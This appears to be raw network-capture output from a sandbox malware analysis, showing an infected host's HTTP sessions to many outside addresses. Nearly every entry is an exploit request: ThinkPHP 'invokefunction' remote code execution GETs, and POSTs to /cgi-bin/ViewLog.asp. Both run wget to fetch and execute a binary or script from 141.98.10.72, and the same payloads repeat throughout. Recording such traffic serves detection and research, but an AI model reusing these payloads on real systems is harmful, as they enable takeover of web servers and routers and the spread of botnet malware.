                                                            Feb 14, 2024 09:29:15.514215946 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            574192.168.2.234849295.56.128.8780
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:15.566741943 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:29:15.856081963 CET29INHTTP/1.1 200 OK
                                                            Feb 14, 2024 09:29:15.856226921 CET515INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68
                                                            Data Ascii: Connection: closePragma: no-cacheCache-Control: no-cacheContent-Type: text/html; charset=utf-8<!DOCTYPE html PUBLIC "-//W3C//Dtd XHTML 1.0 Strict//EN" "http://www.w3.org/tr/xhtml1/Dtd/xhtml1-Transitional.dtd"><html xmlns="http://www


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            575192.168.2.235945095.58.255.23080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:15.608604908 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:29:17.304627895 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:29:19.320406914 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:29:23.383685112 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:29:31.574528933 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:29:47.700385094 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:30:21.487543106 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            576192.168.2.235766688.99.135.23080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:15.699928045 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:29:15.910296917 CET307INHTTP/1.1 400 Bad Request
                                                            Server: nginx
                                                            Date: Wed, 14 Feb 2024 08:29:15 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 150
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            577192.168.2.235476695.160.104.1988080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:15.788223028 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:16.504868031 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            578192.168.2.235468294.123.241.1768080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:15.795253038 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            579192.168.2.234714488.233.139.24280
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:15.813180923 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:29:16.060420036 CET317INHTTP/1.1 400 Bad Request
                                                            Server: Web server
                                                            Date: Wed, 14 Feb 2024 08:29:15 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 155
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 57 65 62 20 73 65 72 76 65 72 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>Web server</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            580192.168.2.235488031.136.222.798080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:16.230916023 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:16.856611967 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:18.104432106 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:20.568068027 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:25.687387943 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:35.669980049 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:56.915018082 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:37.869385958 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            581192.168.2.235586494.123.138.1668080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:16.290818930 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            582192.168.2.235274094.122.221.408080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:16.290956974 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            583192.168.2.233984831.4.254.438080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:16.567514896 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            584192.168.2.233781831.136.55.1528080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:17.108798981 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:17.784708023 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:19.128326893 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:21.847976923 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:27.223366976 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:37.973758936 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:01.010442972 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:44.012676954 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            585192.168.2.233676431.136.132.28080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:17.109914064 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:17.784704924 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
